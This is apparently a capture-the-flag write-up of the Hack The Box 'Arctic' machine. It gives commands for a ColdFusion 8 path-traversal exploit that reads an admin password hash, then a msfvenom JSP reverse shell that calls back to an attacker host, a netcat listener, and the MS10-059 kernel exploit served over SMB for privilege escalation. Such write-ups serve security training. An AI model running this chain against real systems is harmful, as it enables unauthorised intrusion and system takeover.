http://10.10.10.11:8500
http://10.10.10.11:8500/CFIDE/administrator/
searchsploit coldfusion 8
searchsploit -x multiple/remote/14641.py
# http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
we use the path in the exploit
http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
we could use https://crackstation.net/ to crack the password
password=happyday
we enter and see mappins and scheduled tasks
now we have were we can save a task
we need a reverse shell in java so we use msfvenom
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.27 LPORT=443 -f raw > shell.jsp
we use a python http server and start the tasks
now we listen in our machine on port 443 and enter to the url http://10.10.10.11:8500/CFIDE/shell.jsp
type C:\Users\tolis\Desktop\user.txt
we transfer the systeminfo to use windows exploit suggester
./windows-exploit-suggester.py -d 2020-10-25-mssb.xls -i /home/gato/Documentos/htb/Retired/Artic/content/systeminfo.txt
we enter here to download the kernel exploit https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059
we open a smb server and on the other site we download from our machine
smbserber.py a $(pwd)
and open a connection on 4444
nc -lvp 4444
and we execute using the smb server
mkdir chimichurri
cd chumichurri
chimichurri.exe
\\10.10.14.27\a\MS10-059.exe 10.10.14.27 4444
type C:\Users\Administrator\Desktop\root.txt